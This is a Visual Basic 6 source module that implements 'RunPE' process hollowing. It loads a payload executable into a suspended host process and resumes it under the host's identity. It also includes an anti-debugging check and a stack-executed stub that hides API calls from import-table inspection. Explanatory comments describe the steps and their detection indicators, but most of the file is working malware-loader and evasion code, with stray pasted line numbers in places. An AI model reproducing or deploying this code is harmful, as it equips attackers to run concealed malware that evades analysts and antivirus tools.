Option Explicit

' Constants used by Injec / CallAPI. CONTEXT_FULL = CONTEXT_i386 Or
' CONTEXT_CONTROL Or CONTEXT_INTEGER Or CONTEXT_SEGMENTS (&H10000 Or 7).
' MAX_PATH is declared but not referenced anywhere in this file.
Private Const CONTEXT_FULL              As Long = &H10007
Private Const MAX_PATH                  As Integer = 260
Private Const CREATE_SUSPENDED          As Long = &H4
Private Const MEM_COMMIT                As Long = &H1000
Private Const MEM_RESERVE               As Long = &H2000
Private Const PAGE_EXECUTE_READWRITE    As Long = &H40

' Static imports. Only these three, plus the four helpers below, appear in
' the import table; every other API used by Injec is resolved at run time
' through CallAPI. The process/thread attribute parameters of CreateProcessA
' are declared as Long (the callers pass 0), so SECURITY_ATTRIBUTES is never
' actually used.
Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpAppName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, bvBuff As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
' The real OutputDebugStringA returns void; declaring it As Long exposes
' whatever is left in EAX, which IsDebuggerActive relies on.
Private Declare Function OutputDebugString Lib "kernel32" Alias "OutputDebugStringA" (ByVal lpOutputString As String) As Long

' Helpers for CallAPI's run-time resolution and stub execution.
' RtlMoveMemory is the only Public declaration in this module (the rest
' are Private) — an inconsistency, not a functional difference.
Public Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long)
Private Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Private Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long

' Win32 SECURITY_ATTRIBUTES. Declared but not referenced by any routine in
' this file: CreateProcessA is declared with Long attribute pointers and is
' always passed 0.
Private Type SECURITY_ATTRIBUTES
    nLength As Long
    lpSecurityDescriptor As Long
    bInheritHandle As Long
End Type
  24.  
' Win32 STARTUPINFOA (68 bytes: 12 Longs, 2 Integers, 4 Longs). Injec only
' sets cb = Len(Si); all other fields are left at zero. Field order and sizes
' must stay exactly as the Win32 layout, since the structure is passed by
' reference to CreateProcessA.
Private Type STARTUPINFO
    cb As Long
    lpReserved As Long
    lpDesktop As Long
    lpTitle As Long
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type
  45.  
' Win32 PROCESS_INFORMATION, filled in by CreateProcessA. Injec uses
' hProcess (memory writes) and hThread (context get/set, resume); the two
' handles are never closed in this file.
Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessId As Long
    dwThreadID As Long
End Type
  52.  
' x87 floating-point state embedded in the 32-bit CONTEXT (RegisterArea is
' the 80-byte register stack). Present only so CONTEXT has the correct size
' and field offsets; nothing in this file reads it.
Private Type FLOATING_SAVE_AREA
    ControlWord As Long
    StatusWord As Long
    TagWord As Long
    ErrorOffset As Long
    ErrorSelector As Long
    DataOffset As Long
    DataSelector As Long
    RegisterArea(1 To 80) As Byte
    Cr0NpxState As Long
End Type
  64.  
' 32-bit (x86) thread CONTEXT as passed to Get/SetThreadContext by pointer.
' ContextFlags = CONTEXT_FULL selects the control, integer and segment
' register groups. Injec reads Ebx and overwrites Eax. Offsets must match
' the Win32 layout exactly; the structure is only valid for 32-bit threads.
Private Type CONTEXT
    ContextFlags As Long

    Dr0 As Long
    Dr1 As Long
    Dr2 As Long
    Dr3 As Long
    Dr6 As Long
    Dr7 As Long

    FloatSave As FLOATING_SAVE_AREA
    SegGs As Long
    SegFs As Long
    SegEs As Long
    SegDs As Long
    Edi As Long
    Esi As Long
    Ebx As Long
    Edx As Long
    Ecx As Long
    Eax As Long
    Ebp As Long
    Eip As Long
    SegCs As Long
    EFlags As Long
    Esp As Long
    SegSs As Long
End Type
  93.  
' PE/MZ DOS header, 64 bytes (the count Injec copies from bvBuff(0)).
' Only e_lfanew (file offset of IMAGE_NT_HEADERS) is used; e_magic is never
' checked, so a non-PE buffer is not rejected.
Private Type IMAGE_DOS_HEADER
    e_magic As Integer
    e_cblp As Integer
    e_cp As Integer
    e_crlc As Integer
    e_cparhdr As Integer
    e_minalloc As Integer
    e_maxalloc As Integer
    e_ss As Integer
    e_sp As Integer
    e_csum As Integer
    e_ip As Integer
    e_cs As Integer
    e_lfarlc As Integer
    e_ovno As Integer
    e_res(0 To 3) As Integer
    e_oemid As Integer
    e_oeminfo As Integer
    e_res2(0 To 9) As Integer
    e_lfanew As Long
End Type
  115.  
' PE COFF file header (20 bytes). NumberOfSections bounds the section copy
' loop in Injec; Machine is not checked against the 32-bit structures used
' elsewhere in this file.
Private Type IMAGE_FILE_HEADER
    Machine As Integer
    NumberOfSections As Integer
    TimeDateStamp As Long
    PointerToSymbolTable As Long
    NumberOfSymbols As Long
    SizeOfOptionalHeader As Integer
    characteristics As Integer
End Type
  125.  
' One entry of the optional header's DataDirectory table (RVA + size).
Private Type IMAGE_DATA_DIRECTORY
    VirtualAddress As Long
    Size As Long
End Type
  130.  
' PE32 (32-bit) optional header, 224 bytes including the 16 data
' directories. Injec uses ImageBase, SizeOfImage, SizeOfHeaders and
' AddressOfEntryPoint. SizeOfUnitializedData is a misspelling of the Win32
' field name SizeOfUninitializedData; the layout is unaffected. A PE32+
' (64-bit) image has a different layout and would be misread by this type.
Private Type IMAGE_OPTIONAL_HEADER
    Magic As Integer
    MajorLinkerVersion As Byte
    MinorLinkerVersion As Byte
    SizeOfCode As Long
    SizeOfInitializedData As Long
    SizeOfUnitializedData As Long
    AddressOfEntryPoint As Long
    BaseOfCode As Long
    BaseOfData As Long
    ' NT additional fields.
    ImageBase As Long
    SectionAlignment As Long
    FileAlignment As Long
    MajorOperatingSystemVersion As Integer
    MinorOperatingSystemVersion As Integer
    MajorImageVersion As Integer
    MinorImageVersion As Integer
    MajorSubsystemVersion As Integer
    MinorSubsystemVersion As Integer
    W32VersionValue As Long
    SizeOfImage As Long
    SizeOfHeaders As Long
    CheckSum As Long
    SubSystem As Integer
    DllCharacteristics As Integer
    SizeOfStackReserve As Long
    SizeOfStackCommit As Long
    SizeOfHeapReserve As Long
    SizeOfHeapCommit As Long
    LoaderFlags As Long
    NumberOfRvaAndSizes As Long
    DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY
End Type
  165.  
' PE NT headers: 4-byte Signature + 20-byte file header + 224-byte PE32
' optional header = 248 bytes, which is the count Injec copies from
' bvBuff(e_lfanew). Signature ("PE\0\0") is never validated.
Private Type IMAGE_NT_HEADERS
    Signature As Long
    FileHeader As IMAGE_FILE_HEADER
    OptionalHeader As IMAGE_OPTIONAL_HEADER
End Type
  171.  
' PE section table entry, 40 bytes (the stride 40 * i used by Injec's loop).
' SecName is the Win32 Name field as a fixed 8-character string. Injec uses
' VirtualAddress, PointerToRawData and SizeOfRawData without bounds-checking
' them against the buffer.
Private Type IMAGE_SECTION_HEADER
    SecName As String * 8
    VirtualSize As Long
    VirtualAddress  As Long
    SizeOfRawData As Long
    PointerToRawData As Long
    PointerToRelocations As Long
    PointerToLinenumbers As Long
    NumberOfRelocations As Integer
    NumberOfLinenumbers As Integer
    characteristics  As Long
End Type
  184.  
Public Function IsDebuggerActive() As Boolean
' Anti-debugging heuristic. The value tested is whatever EAX holds after
' OutputDebugStringA returns (the real API is void, see the Declare), so
' this reads an undocumented side effect and reports "debugger present"
' whenever that value is not 1. NOTE(review): how this behaves across
' Windows versions is not established here — treat it as a heuristic, not
' a reliable signal. The argument VarPtr(ByVal "=)") appears to pass the
' address of the literal, implicitly converted to a decimal string; the
' string content itself is irrelevant to the check.
IsDebuggerActive = Not (OutputDebugString(VarPtr(ByVal "=)")) = 1)
End Function
Private Function CallAPI(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
    ' Calls an exported function by name without a Declare statement:
    ' resolves it with LoadLibraryA/GetProcAddress, writes a small x86 stub
    ' into a local Byte array (i.e. onto the stack) and runs that stub via
    ' CallWindowProcA. Because no import entry exists for the target,
    ' static import-table inspection does not show the calls made through
    ' here (Injec uses it for NtUnmapViewOfSection, VirtualAllocEx,
    ' Get/SetThreadContext and ResumeThread); the LoadLibraryA/GetProcAddress
    ' pair and the plain-text API names are the visible indicators. Running
    ' code from a stack buffer is presumably blocked where DEP is enforced
    ' for the process.
    '
    ' sLib:   module name handed to LoadLibraryA.
    ' sMod:   export name handed to GetProcAddress.
    ' Params: 32-bit arguments (converted with CLng), pushed last-first.
    ' Returns the target's EAX on return, or 0 when the export is not found.
    Dim lPtr                As Long
    Dim bvASM(&HEC00& - 1)  As Byte
    Dim i                   As Long
    Dim lMod                As Long

    lMod = GetProcAddress(LoadLibraryA(sLib), sMod)
    If lMod = 0 Then Exit Function

    lPtr = VarPtr(bvASM(0))
    ' Prologue bytes 58 59 59 59 59 50: pop eax; pop ecx (x4); push eax —
    ' keeps the return address and discards the four CallWindowProcA
    ' arguments (p1..p4) so the stack is clean for the real call.
    RtlMoveMemory ByVal lPtr, &H59595958, &H4:              lPtr = lPtr + 4
    RtlMoveMemory ByVal lPtr, &H5059, &H2:                  lPtr = lPtr + 2
    ' 68 imm32 = push imm32, one per parameter, last parameter first.
    For i = UBound(Params) To 0 Step -1
        RtlMoveMemory ByVal lPtr, &H68, &H1:                lPtr = lPtr + 1
        RtlMoveMemory ByVal lPtr, CLng(Params(i)), &H4:     lPtr = lPtr + 4
    Next
    ' E8 rel32 = call lMod. The displacement is relative to the end of this
    ' 5-byte instruction: lPtr points at the rel32 field, hence lMod - lPtr - 4.
    RtlMoveMemory ByVal lPtr, &HE8, &H1:                    lPtr = lPtr + 1
    RtlMoveMemory ByVal lPtr, lMod - lPtr - 4, &H4:         lPtr = lPtr + 4
    ' C3 = ret. No argument cleanup is emitted, so this presumably relies on
    ' the target using the stdcall convention (callee removes arguments).
    RtlMoveMemory ByVal lPtr, &HC3, &H1:                    lPtr = lPtr + 1
    ' The stub address is handed to CallWindowProcA as if it were a window
    ' procedure; its four dummy arguments are the ones popped above.
    CallAPI = CallWindowProcA(VarPtr(bvASM(0)), 0, 0, 0, 0)
End Function
  209.  
Sub Injec(ByVal sHost As String, ByRef bvBuff() As Byte, parameter As String)
    ' Process hollowing ("RunPE"): starts sHost suspended, replaces its
    ' mapped image with the PE held in bvBuff, points the initial thread at
    ' the new entry point and resumes it. Only CreateProcessA and
    ' WriteProcessMemory are static imports; every other step goes through
    ' CallAPI. Detection note: the sequence CreateProcess(CREATE_SUSPENDED)
    ' -> NtUnmapViewOfSection -> VirtualAllocEx(PAGE_EXECUTE_READWRITE) ->
    ' WriteProcessMemory -> SetThreadContext -> ResumeThread against a
    ' freshly created child is the canonical hollowing signature. None of
    ' the API results are checked and bvBuff is not validated in any way.
    '
    ' sHost:     path of the host executable created suspended.
    ' bvBuff:    raw bytes of the PE32 image to place into the host.
    ' parameter: appended to the host's command line after a space
    '            (ByRef by default; it is not modified here).
    Dim i       As Long
    Dim Pidh    As IMAGE_DOS_HEADER
    Dim Pinh    As IMAGE_NT_HEADERS
    Dim Pish    As IMAGE_SECTION_HEADER
    Dim Si      As STARTUPINFO
    Dim Pi      As PROCESS_INFORMATION
    Dim Ctx     As CONTEXT

    Si.cb = Len(Si)

    ' Read the 64-byte DOS header and the 248-byte PE32 NT headers straight
    ' out of the buffer. e_lfanew is used as an index without a bounds check.
    RtlMoveMemory Pidh, bvBuff(0), 64
    RtlMoveMemory Pinh, bvBuff(Pidh.e_lfanew), 248

    ' Host is created suspended so its initial thread can be redirected
    ' before any of the host's own code runs.
    CreateProcessA sHost, " " & parameter, 0, 0, False, CREATE_SUSPENDED, 0, 0, Si, Pi
    ' Unmap whatever the host has at the payload's preferred ImageBase, then
    ' allocate a read/write/execute region of SizeOfImage at that address.
    CallAPI "ntdll", "NtUnmapViewOfSection", Pi.hProcess, Pinh.OptionalHeader.ImageBase
    CallAPI "kernel32", "VirtualAllocEx", Pi.hProcess, Pinh.OptionalHeader.ImageBase, Pinh.OptionalHeader.SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE
    ' Copy the PE headers to the image base.
    WriteProcessMemory Pi.hProcess, ByVal Pinh.OptionalHeader.ImageBase, bvBuff(0), Pinh.OptionalHeader.SizeOfHeaders, 0

    ' Copy each section from its raw file offset to ImageBase + RVA. The
    ' section table starts right after the 248-byte NT headers and each
    ' entry is 40 bytes. PointerToRawData/SizeOfRawData are trusted as-is.
    For i = 0 To Pinh.FileHeader.NumberOfSections - 1
        RtlMoveMemory Pish, bvBuff(Pidh.e_lfanew + 248 + 40 * i), Len(Pish)
        WriteProcessMemory Pi.hProcess, ByVal Pinh.OptionalHeader.ImageBase + Pish.VirtualAddress, bvBuff(Pish.PointerToRawData), Pish.SizeOfRawData, 0
    Next i

    ' Fetch the suspended thread's full register context.
    Ctx.ContextFlags = CONTEXT_FULL
    CallAPI "kernel32", "GetThreadContext", Pi.hThread, VarPtr(Ctx)
    ' Ebx + 8 is presumably the PEB ImageBaseAddress field (Ebx holding the
    ' PEB pointer on a fresh initial thread is a convention, not verified
    ' here); it is overwritten with the payload's base. Eax, likewise
    ' presumably the thread's start address, is pointed at the payload
    ' entry point before the thread is resumed.
    WriteProcessMemory Pi.hProcess, ByVal Ctx.Ebx + 8, Pinh.OptionalHeader.ImageBase, 4, 0
    Ctx.Eax = Pinh.OptionalHeader.ImageBase + Pinh.OptionalHeader.AddressOfEntryPoint
    CallAPI "kernel32", "SetThreadContext", Pi.hThread, VarPtr(Ctx)
    CallAPI "kernel32", "ResumeThread", Pi.hThread
End Sub
  241.  
  242. Public Function StrToBytArray(ByVal sStr As String) As Byte()
  243. Dim i As Long
  244. Dim Buffer() As Byte
  245.     ReDim Buffer(Len(sStr) - 1)
  246.     For i = 1 To Len(sStr)
  247.         Buffer(i - 1) = Asc(Mid(sStr, i, 1))
  248.     Next i
  249.     StrToBytArray = Buffer
  250. End Function
  251.  
  252. Public Function ThisExe() As String
  253.     Dim lRet        As Long
  254.     Dim bvBuff(255) As Byte
  255.     lRet = CallAPI("kernel32", "GetModuleFileNameA", App.hInstance, VarPtr(bvBuff(0)), 256)
  256.     ThisExe = Left$(StrConv(bvBuff, vbUnicode), lRet)
  257. End Function